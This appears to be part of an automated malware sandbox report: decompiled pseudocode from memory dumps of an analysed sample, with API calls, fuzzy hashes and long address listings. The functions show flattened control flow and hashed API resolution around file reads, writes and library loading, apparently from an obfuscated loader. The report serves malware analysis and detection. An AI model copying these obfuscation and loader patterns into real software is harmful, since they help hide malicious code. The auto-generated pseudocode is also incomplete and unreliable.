                                                                                                                                                        0x005c8378
                                                                                                                                                        0x005c8378
                                                                                                                                                        0x005c832b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c831d
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.399411659.00000000005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.399402581.00000000005C0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.399473393.00000000005D4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.399490424.00000000005D7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateProcess
                                                                                                                                                        • String ID: ,!-$,!-$)}$)}$)}
                                                                                                                                                        • API String ID: 963392458-3082868487
                                                                                                                                                        • Opcode ID: 9201e7a053d5d05c994b5693df976931112c07eb7d85478749a20647e1e8586b
                                                                                                                                                        • Instruction ID: a01fe7724682f23228aeb9a7e1788cfadb8554921ee61967e103eef501ea7ae1
                                                                                                                                                        • Opcode Fuzzy Hash: 9201e7a053d5d05c994b5693df976931112c07eb7d85478749a20647e1e8586b
                                                                                                                                                        • Instruction Fuzzy Hash: B46138727086C44EDB188B99A899B3FAF50F7D5798F14452EBA8A87F44CE7CC845CB00
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD6964F8C4, Relevance: 18.1, APIs: 12, Instructions: 133COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3885183344-0
                                                                                                                                                        • Opcode ID: dce21416953a63e4cd65027267813f30f6dd41bfac184dd409308fef620cfa1d
                                                                                                                                                        • Instruction ID: a2b8dabb22d5666fc93f1bd99988952bf5f98b373a6b4fae572db753f9f1f973
                                                                                                                                                        • Opcode Fuzzy Hash: dce21416953a63e4cd65027267813f30f6dd41bfac184dd409308fef620cfa1d
                                                                                                                                                        • Instruction Fuzzy Hash: 69518E21F0CF43D6FA50AFE1A8713B92290AF46B9CF548036E94D87297DE2DE445A703
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C5183, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 28%
                                                                                                                                                        			E005C5183(intOrPtr __ebp, long long* __rax, intOrPtr __rcx, intOrPtr __rdx, void* __r9) {
				void* _v72;
				long long _v80;
				void* _v84;
				void* _v96;
				intOrPtr _v100;
				long long _v120;
				intOrPtr _v128;
				long long _v136;
				void* _t28;
				signed int _t41;
				void* _t54;
				long long* _t62;
				long long _t76;
				intOrPtr _t77;

				_t62 = __rax;
				_t55 = __ebp;
				_t77 = __rdx;
				r8d = 0xc477c672;
				r9d = 0x14;
				E005CFAD7(1, _t54, __rax, __rcx);
				_v120 = 0;
				_v128 = 0x80;
				_v136 = 3;
				_t64 = __rcx;
				r8d = 0;
				r9d = 0; // executed
				CreateFileA(??, ??, ??, ??, ??, ??, ??); // executed
				_v96 = _t62;
				_t28 = 0x3e2c6175;
				_t76 =  &_v84;
				r13d = 0x6659733c;
				L1:
				while(1) {
					L1:
					while(1) {
						if(_t28 > 0xfe04215b) {
							if(_t28 > 0x620111d1) {
								if(_t28 == 0x620111d2) {
									r8d = 0x626eda1b;
									r9d = 0x25;
									E005CFAD7(1, _t54, _t62, _t64);
									_v100 =  *_t62();
									E005CCFAA(); // executed
									_v80 = _t62;
									_v72 = _t76;
									_t62 = _v72;
									_v84 = 0;
									_t55 = _v100;
									r8d = 0x89f6df47;
									r9d = 0x1a;
									E005CFAD7(1, _t54, _t62, _v96);
									_v136 = 0;
									_t64 = _v96;
									r8d = _v100;
									ReadFile(??, ??, ??, ??, ??); // executed
									_t28 =  ==  ? r13d : 0xfe04215c;
								} else {
									if(_t28 == 0x6659733c) {
										_t28 = 0xd30433be;
										r12d = 0;
									}
								}
							} else {
								if(_t28 == 0xfe04215c) {
									r8d = _v100;
									_t64 = _t77;
									r12d = E005C5006(_t55, _t62, _t77, _v80);
									_t28 = 0xd30433be;
								} else {
									if(_t28 == 0x3e2c6175) {
										_t62 = _v96;
										_t28 =  ==  ? 0xa4d77e7d : 0x620111d2;
									}
								}
							}
							continue;
						}
						if(_t28 == 0xa4d77e7d) {
							_t28 = 0xaf4edb4a;
							_t41 = 0;
							continue;
						}
						if(_t28 == 0xaf4edb4a) {
							return (_t41 ^ 0x000000fe) & 0xffffff00 | ((_t41 ^ 0x000000fe) & _t41) != 0x00000000;
						}
						if(_t28 == 0xd30433be) {
							r8d = 0x2db58ff7;
							r9d = 0x11;
							E005CFAD7(1, _t54, _t62, _t64);
							_t64 = _v96;
							 *_t62();
							_t62 = _v72;
							_t28 = 0xaf4edb4a;
							_t41 = r12d;
						}
					}
				}
			}

















                                                                                                                                                        0x005c5183
                                                                                                                                                        0x005c5183
                                                                                                                                                        0x005c5193
                                                                                                                                                        0x005c51a0
                                                                                                                                                        0x005c51a6
                                                                                                                                                        0x005c51ac
                                                                                                                                                        0x005c51b1
                                                                                                                                                        0x005c51ba
                                                                                                                                                        0x005c51c2
                                                                                                                                                        0x005c51ca
                                                                                                                                                        0x005c51d2
                                                                                                                                                        0x005c51d5
                                                                                                                                                        0x005c51d8
                                                                                                                                                        0x005c51da
                                                                                                                                                        0x005c51df
                                                                                                                                                        0x005c51e4
                                                                                                                                                        0x005c51e9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c51ef
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c51ef
                                                                                                                                                        0x005c51f4
                                                                                                                                                        0x005c51fb
                                                                                                                                                        0x005c527d
                                                                                                                                                        0x005c52ce
                                                                                                                                                        0x005c52d4
                                                                                                                                                        0x005c52da
                                                                                                                                                        0x005c52e6
                                                                                                                                                        0x005c52ee
                                                                                                                                                        0x005c52f3
                                                                                                                                                        0x005c52f8
                                                                                                                                                        0x005c52fd
                                                                                                                                                        0x005c5302
                                                                                                                                                        0x005c530f
                                                                                                                                                        0x005c531f
                                                                                                                                                        0x005c5325
                                                                                                                                                        0x005c532b
                                                                                                                                                        0x005c5330
                                                                                                                                                        0x005c5339
                                                                                                                                                        0x005c533f
                                                                                                                                                        0x005c5345
                                                                                                                                                        0x005c534f
                                                                                                                                                        0x005c527f
                                                                                                                                                        0x005c5284
                                                                                                                                                        0x005c528a
                                                                                                                                                        0x005c528f
                                                                                                                                                        0x005c528f
                                                                                                                                                        0x005c5284
                                                                                                                                                        0x005c51fd
                                                                                                                                                        0x005c5202
                                                                                                                                                        0x005c5297
                                                                                                                                                        0x005c52a1
                                                                                                                                                        0x005c52a9
                                                                                                                                                        0x005c52ac
                                                                                                                                                        0x005c5208
                                                                                                                                                        0x005c520d
                                                                                                                                                        0x005c520f
                                                                                                                                                        0x005c5222
                                                                                                                                                        0x005c5222
                                                                                                                                                        0x005c520d
                                                                                                                                                        0x005c5202
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c51fb
                                                                                                                                                        0x005c522c
                                                                                                                                                        0x005c52b6
                                                                                                                                                        0x005c52bb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c52bb
                                                                                                                                                        0x005c5237
                                                                                                                                                        0x005c5371
                                                                                                                                                        0x005c5371
                                                                                                                                                        0x005c5242
                                                                                                                                                        0x005c5250
                                                                                                                                                        0x005c5256
                                                                                                                                                        0x005c525c
                                                                                                                                                        0x005c5261
                                                                                                                                                        0x005c5264
                                                                                                                                                        0x005c5266
                                                                                                                                                        0x005c526b
                                                                                                                                                        0x005c5270
                                                                                                                                                        0x005c5270
                                                                                                                                                        0x005c5242
                                                                                                                                                        0x005c51ef

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.399411659.00000000005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.399402581.00000000005C0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.399473393.00000000005D4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.399490424.00000000005D7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$CreateRead
                                                                                                                                                        • String ID: <sYf$<sYf$ua,>$ua,>
                                                                                                                                                        • API String ID: 3388366904-4291059099
                                                                                                                                                        • Opcode ID: 4c731d61eb40df0d4f88c1ee5f3256cdbd74c9691d7bbb30d7f76f9a8b0d01db
                                                                                                                                                        • Instruction ID: f0e2f149668b732879b09633ed9aad8ff38b5c01a212bb2f2ccb312f4091280e
                                                                                                                                                        • Opcode Fuzzy Hash: 4c731d61eb40df0d4f88c1ee5f3256cdbd74c9691d7bbb30d7f76f9a8b0d01db
                                                                                                                                                        • Instruction Fuzzy Hash: 22412E313085444ADB2486DAE958F1AEA51F7C5BD4F240539FE898BB94EF7DE981C700
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD69654574, Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FFD69651FCB), ref: 00007FFD6965458D
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFD69651FCB), ref: 00007FFD696545EF
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFD69651FCB), ref: 00007FFD69654629
                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFD69651FCB), ref: 00007FFD69654653
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1557788787-0
                                                                                                                                                        • Opcode ID: e23d25e9923bc348d38db6fd334f4b2d81dbd54319081587aee838d2b463a19b
                                                                                                                                                        • Instruction ID: d08b04231ad8aac1e00c9929744768c09f1b584209b60947680d431d4f21a2dd
                                                                                                                                                        • Opcode Fuzzy Hash: e23d25e9923bc348d38db6fd334f4b2d81dbd54319081587aee838d2b463a19b
                                                                                                                                                        • Instruction Fuzzy Hash: 39218421F08F91C1E6208F52A56012976A4BB54BF4B484174DE9E23BD4DF7CD4528301
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005CEFD3, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                        			E005CEFD3(intOrPtr __edx, long long __rax, long long __rcx, void* __rdx, void* __r8, void* __r11) {
				long long _v72;
				long long _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				long long _v104;
				long long _v112;
				intOrPtr _t24;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t44;
				void* _t46;
				long long _t56;
				long long _t61;
				void* _t63;
				long long _t64;
				long long _t66;
				void* _t68;
				void* _t69;
				long long _t70;

				_t69 = __r11;
				_t68 = __r8;
				_t63 = __rdx;
				_t62 = __rcx;
				_t56 = __rax;
				_t66 = __rcx;
				_v84 = r8d;
				_t34 =  ==  ? 0x64798daa : 0x23a3853d;
				_v88 =  ==  ? 0x64798daa : 0x23a3853d;
				r13d = 0x8f34f1b0;
				r13d =  ==  ? 0x84c104ed : r13d;
				_v92 = __edx;
				r14d = 0x71c9cf43;
				r14d =  ==  ? 0xf3019199 : r14d;
				_t24 = 0xf82b818e;
				while(1) {
					L1:
					_t35 = _t24;
					if(_t24 <= 0x18bc41aa) {
						break;
					}
					if(_t35 > 0x38ab292f) {
						if(_t35 > 0x65e67dfa) {
							if(_t35 == 0x71c9cf43) {
								r12d = 0;
								_t64 = _t66;
								_t24 = r13d;
								continue;
							}
							_t24 = _t35;
							if(_t35 != 0x65e67dfb) {
								continue;
							}
							return _t24;
						}
						if(_t35 == 0x38ab2930) {
							_t56 = _v112;
							_t24 = 0x98ea932f;
							if( *_t56 != 0) {
								_t24 = 0x33675366;
							}
							L40:
							_t61 = _v104;
							continue;
						}
						_t24 = _t35;
						if(_t35 == 0x64798daa) {
							_t24 = 0x65e67dfb;
						}
						continue;
					}
					if(_t35 > 0x2f447a17) {
						if(_t35 == 0x2f447a18) {
							_t24 = 0xfaff49ef;
							continue;
						}
						_t24 = _t35;
						if(_t35 != 0x33675366) {
							continue;
						}
						r8d = 0x18d1ea71;
						r9d = 0x2b;
						E005CFAD7(1, 0, _t56, _t62);
						_t62 = _v112;
						 *_t56();
						_t61 = _t56;
						_t24 = 0x18bc41ab;
						if(_t61 == 0) {
							continue;
						}
						L32:
						_t24 = 0x98ea932f;
						continue;
					}
					if(_t35 == 0x18bc41ab) {
						r8d = 0x84161500;
						r9d = 2;
						E005CFAD7(1, 0, _t56, _t62);
						_t62 = _v112; // executed
						LoadLibraryA(??); // executed
						goto L32;
					} else {
						_t24 = _t35;
						if(_t35 == 0x23a3853d) {
							_t62 = _v72;
							E005CF29F(_v84, _t44, _t46, _v72, _t63, _t68, _t69);
							_v80 = _t56;
							_t24 = 0xe79882b1;
							if(_v80 != 0) {
								_t24 = 0x2f447a18;
							}
						}
						continue;
					}
				}
				if(_t35 <= 0xe79882b0) {
					if(_t35 == 0x84c104ed) {
						E005CF5B9(_v92);
						_t64 = _t56;
						_t24 = 0x8f34f1b0;
						r12d = 0;
						goto L1;
					}
					if(_t35 == 0x8f34f1b0) {
						_v104 = _t70;
						_v112 = _t64;
						_t62 = _v104;
						_t43 = 0x38ab2930;
						if(_v112 == _t61) {
							_t43 = 0x98ea932f;
						}
						_t24 =  ==  ? _t43 : 0x98ea932f;
						goto L40;
					}
					_t24 = _t35;
					if(_t35 == 0x98ea932f) {
						_v72 = _t61;
						_t24 = _v88;
					}
				} else {
					if(_t35 > 0xf82b818d) {
						_t24 = r14d;
						if(_t35 != 0xf82b818e) {
							_t24 = _t35;
							if(_t35 == 0xfaff49ef) {
								_t24 = 0x65e67dfb;
							}
						}
					} else {
						if(_t35 == 0xe79882b1) {
							_t24 = 0xfaff49ef;
						} else {
							_t24 = _t35;
							if(_t35 == 0xf3019199) {
								_t24 = 0x8f34f1b0;
								_t70 =  *0x5d5030;
								_t64 = _t66;
							}
						}
					}
				}
			}























                                                                                                                                                        0x005cefd3
                                                                                                                                                        0x005cefd3
                                                                                                                                                        0x005cefd3
                                                                                                                                                        0x005cefd3
                                                                                                                                                        0x005cefd3
                                                                                                                                                        0x005cefe3
                                                                                                                                                        0x005cefe6
                                                                                                                                                        0x005ceff8
                                                                                                                                                        0x005ceffb
                                                                                                                                                        0x005cf007
                                                                                                                                                        0x005cf00d
                                                                                                                                                        0x005cf011
                                                                                                                                                        0x005cf01d
                                                                                                                                                        0x005cf023
                                                                                                                                                        0x005cf027
                                                                                                                                                        0x005cf02c
                                                                                                                                                        0x005cf02c
                                                                                                                                                        0x005cf02c
                                                                                                                                                        0x005cf033
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005cf03b
                                                                                                                                                        0x005cf0d2
                                                                                                                                                        0x005cf1b4
                                                                                                                                                        0x005cf27d
                                                                                                                                                        0x005cf280
                                                                                                                                                        0x005cf283
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005cf283
                                                                                                                                                        0x005cf1ba
                                                                                                                                                        0x005cf1c2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005cf29e
                                                                                                                                                        0x005cf29e
                                                                                                                                                        0x005cf0de
                                                                                                                                                        0x005cf208
                                                                                                                                                        0x005cf210
                                                                                                                                                        0x005cf215
                                                                                                                                                        0x005cf217
                                                                                                                                                        0x005cf217
                                                                                                                                                        0x005cf264
                                                                                                                                                        0x005cf264
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005cf264
                                                                                                                                                        0x005cf0e4
                                                                                                                                                        0x005cf0ec
                                                                                                                                                        0x005cf0f7
                                                                                                                                                        0x005cf0f7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005cf0ec
                                                                                                                                                        0x005cf047
                                                                                                                                                        0x005cf13b
                                                                                                                                                        0x005cf26e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005cf273
                                                                                                                                                        0x005cf141
                                                                                                                                                        0x005cf149
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005cf15b
                                                                                                                                                        0x005cf161
                                                                                                                                                        0x005cf167
                                                                                                                                                        0x005cf16c
                                                                                                                                                        0x005cf16f
                                                                                                                                                        0x005cf171
                                                                                                                                                        0x005cf174
                                                                                                                                                        0x005cf17c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005cf1f2
                                                                                                                                                        0x005cf1f2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005cf1f2
                                                                                                                                                        0x005cf053
                                                                                                                                                        0x005cf1d9
                                                                                                                                                        0x005cf1df
                                                                                                                                                        0x005cf1e5
                                                                                                                                                        0x005cf1ea
                                                                                                                                                        0x005cf1ed
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005cf059
                                                                                                                                                        0x005cf059
                                                                                                                                                        0x005cf061
                                                                                                                                                        0x005cf063
                                                                                                                                                        0x005cf06c
                                                                                                                                                        0x005cf071
                                                                                                                                                        0x005cf07c
                                                                                                                                                        0x005cf081
                                                                                                                                                        0x005cf083
                                                                                                                                                        0x005cf083
                                                                                                                                                        0x005cf081
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005cf061
                                                                                                                                                        0x005cf053
                                                                                                                                                        0x005cf090
                                                                                                                                                        0x005cf107
                                                                                                                                                        0x005cf222
                                                                                                                                                        0x005cf227
                                                                                                                                                        0x005cf22a
                                                                                                                                                        0x005cf22f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005cf22f
                                                                                                                                                        0x005cf113
                                                                                                                                                        0x005cf237
                                                                                                                                                        0x005cf23c
                                                                                                                                                        0x005cf241
                                                                                                                                                        0x005cf246
                                                                                                                                                        0x005cf257
                                                                                                                                                        0x005cf259
                                                                                                                                                        0x005cf259
                                                                                                                                                        0x005cf261
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005cf261
                                                                                                                                                        0x005cf119
                                                                                                                                                        0x005cf121
                                                                                                                                                        0x005cf127
                                                                                                                                                        0x005cf12c
                                                                                                                                                        0x005cf12c
                                                                                                                                                        0x005cf092
                                                                                                                                                        0x005cf098
                                                                                                                                                        0x005cf184
                                                                                                                                                        0x005cf18d
                                                                                                                                                        0x005cf193
                                                                                                                                                        0x005cf19b
                                                                                                                                                        0x005cf1a1
                                                                                                                                                        0x005cf1a6
                                                                                                                                                        0x005cf19b
                                                                                                                                                        0x005cf09e
                                                                                                                                                        0x005cf0a4
                                                                                                                                                        0x005cf1fc
                                                                                                                                                        0x005cf0aa
                                                                                                                                                        0x005cf0aa
                                                                                                                                                        0x005cf0b2
                                                                                                                                                        0x005cf0b8
                                                                                                                                                        0x005cf0bd
                                                                                                                                                        0x005cf0c4
                                                                                                                                                        0x005cf0c4
                                                                                                                                                        0x005cf0b2
                                                                                                                                                        0x005cf0a4
                                                                                                                                                        0x005cf098

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,EA203201,079849AE,E8F2AD3B,00000095,?,?,00000001,005CFC0A,?,?,079849AE,E8F2AD3B), ref: 005CF1ED
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.399411659.00000000005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.399402581.00000000005C0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.399473393.00000000005D4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.399490424.00000000005D7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                        • String ID: fSg3$fSg3
                                                                                                                                                        • API String ID: 1029625771-263991881
                                                                                                                                                        • Opcode ID: 3d0265caa5a6fd1482380c2ac525c3344cc87223c6ea81e310f15978c367fdea
                                                                                                                                                        • Instruction ID: 7abe542a49cf9ef19cb6ac62842a38b0d4a3e03f5f6b3a2812249175f07726e0
                                                                                                                                                        • Opcode Fuzzy Hash: 3d0265caa5a6fd1482380c2ac525c3344cc87223c6ea81e310f15978c367fdea
                                                                                                                                                        • Instruction Fuzzy Hash: 10512825314500CEDA3845B9B898F3D6DA2BB54BE4F68543EFE4BDBB15D62DDC408710
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD6964E85B, Relevance: 5.0, APIs: 3, Instructions: 462memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Virtual$HeapProtect$AllocFreeProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1780707458-0
                                                                                                                                                        • Opcode ID: e003006eba0220ca3cf5e85d95ded9ea3350dc4a32857c35433f8b55746bfd22
                                                                                                                                                        • Instruction ID: 76659044ac7542b5500cebc55fa375bccaad63ccb0a1070099533da654066678
                                                                                                                                                        • Opcode Fuzzy Hash: e003006eba0220ca3cf5e85d95ded9ea3350dc4a32857c35433f8b55746bfd22
                                                                                                                                                        • Instruction Fuzzy Hash: 18223326F0CB81CAEA75CED5A1A037D67A1EB94B44F10843AE68E47BD4DE3CD4449B43
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C5006, Relevance: 4.6, APIs: 3, Instructions: 102fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 35%
                                                                                                                                                        			E005C5006(signed int __ebp, long long __rax, intOrPtr __rcx, void* __rdx) {
				long long _v72;
				void* _v76;
				long long _v88;
				long long _v104;
				intOrPtr _v112;
				long long _v120;
				void* _t20;
				signed int _t38;
				intOrPtr _t51;
				long long _t57;

				_t46 = __rax;
				_t38 = __ebp;
				r13d = r8d;
				r8d = 0xc477c672;
				r9d = 0x14;
				E005CFAD7(1, 0, __rax, __rcx);
				_v104 = 0;
				_v112 = 0x80;
				_v120 = 2;
				_t51 = __rcx;
				r8d = 0;
				r9d = 0; // executed
				CreateFileA(??, ??, ??, ??, ??, ??, ??); // executed
				_v88 = _t46;
				_t20 = 0xb15f5f99;
				r15d = 0xc19462cc;
				_t57 =  &_v76;
				r12d = 0x59f130e7;
				L1:
				if(_t20 > 0x34b93064) {
					if(_t20 == 0x34b93065) {
						_v72 = _t57;
						_t46 = _v72;
						_v76 = 0;
						r8d = 0xc2b6cfaf;
						r9d = 0x16;
						E005CFAD7(1, 0, _v72, _t51);
						_v120 = 0;
						_t51 = _v88;
						r8d = r13d;
						WriteFile(??, ??, ??, ??, ??); // executed
						_t20 =  ==  ? r12d : 0x3e1c0349;
						sil = 1;
					} else {
						if(_t20 == 0x3e1c0349) {
							r8d = 0x2db58ff7;
							r9d = 0x11;
							E005CFAD7(1, 0, _t46, _t51);
							_t51 = _v88; // executed
							FindCloseChangeNotification(??); // executed
							_t46 = _v72;
							_t20 = 0xd669f95a;
							_t38 = 0;
						} else {
							if(_t20 == 0x59f130e7) {
								_t20 = 0x3e1c0349;
							}
						}
					}
				} else {
					if(_t20 == 0xb15f5f99) {
						_t46 = _v88;
						_t20 =  ==  ? r15d : 0x34b93065;
					} else {
						if(_t20 == 0xc19462cc) {
							_t20 = 0xd669f95a;
							_t38 = 0;
						} else {
							if(_t20 != 0xd669f95a) {
								goto L1;
							} else {
								return (_t38 ^ 0x000000fe) & 0xffffff00 | ((_t38 ^ 0x000000fe) & bpl) != 0x00000000;
							}
						}
					}
				}
				goto L1;
			}













                                                                                                                                                        0x005c5006
                                                                                                                                                        0x005c5006
                                                                                                                                                        0x005c5016
                                                                                                                                                        0x005c5026
                                                                                                                                                        0x005c502c
                                                                                                                                                        0x005c5032
                                                                                                                                                        0x005c5037
                                                                                                                                                        0x005c5040
                                                                                                                                                        0x005c5048
                                                                                                                                                        0x005c5050
                                                                                                                                                        0x005c5058
                                                                                                                                                        0x005c505b
                                                                                                                                                        0x005c505e
                                                                                                                                                        0x005c5060
                                                                                                                                                        0x005c5065
                                                                                                                                                        0x005c506a
                                                                                                                                                        0x005c5070
                                                                                                                                                        0x005c5075
                                                                                                                                                        0x005c507b
                                                                                                                                                        0x005c5080
                                                                                                                                                        0x005c50a1
                                                                                                                                                        0x005c50db
                                                                                                                                                        0x005c50e0
                                                                                                                                                        0x005c50e5
                                                                                                                                                        0x005c50f9
                                                                                                                                                        0x005c50ff
                                                                                                                                                        0x005c5105
                                                                                                                                                        0x005c510a
                                                                                                                                                        0x005c5113
                                                                                                                                                        0x005c5119
                                                                                                                                                        0x005c511f
                                                                                                                                                        0x005c5129
                                                                                                                                                        0x005c512d
                                                                                                                                                        0x005c50a3
                                                                                                                                                        0x005c50a8
                                                                                                                                                        0x005c5141
                                                                                                                                                        0x005c5147
                                                                                                                                                        0x005c514d
                                                                                                                                                        0x005c5152
                                                                                                                                                        0x005c5155
                                                                                                                                                        0x005c5157
                                                                                                                                                        0x005c515c
                                                                                                                                                        0x005c5161
                                                                                                                                                        0x005c50ae
                                                                                                                                                        0x005c50b3
                                                                                                                                                        0x005c50b5
                                                                                                                                                        0x005c50ba
                                                                                                                                                        0x005c50b3
                                                                                                                                                        0x005c50a8
                                                                                                                                                        0x005c5082
                                                                                                                                                        0x005c5087
                                                                                                                                                        0x005c50be
                                                                                                                                                        0x005c50cc
                                                                                                                                                        0x005c5089
                                                                                                                                                        0x005c508e
                                                                                                                                                        0x005c50d2
                                                                                                                                                        0x005c50d7
                                                                                                                                                        0x005c5090
                                                                                                                                                        0x005c5095
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c5097
                                                                                                                                                        0x005c5182
                                                                                                                                                        0x005c5182
                                                                                                                                                        0x005c5095
                                                                                                                                                        0x005c508e
                                                                                                                                                        0x005c5087
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,005C52A9), ref: 005C505E
                                                                                                                                                        • WriteFile.KERNELBASE(?,?,?,?,?,?,?,?,?,?,005C52A9), ref: 005C511F
                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,005C52A9), ref: 005C5155
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.399411659.00000000005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
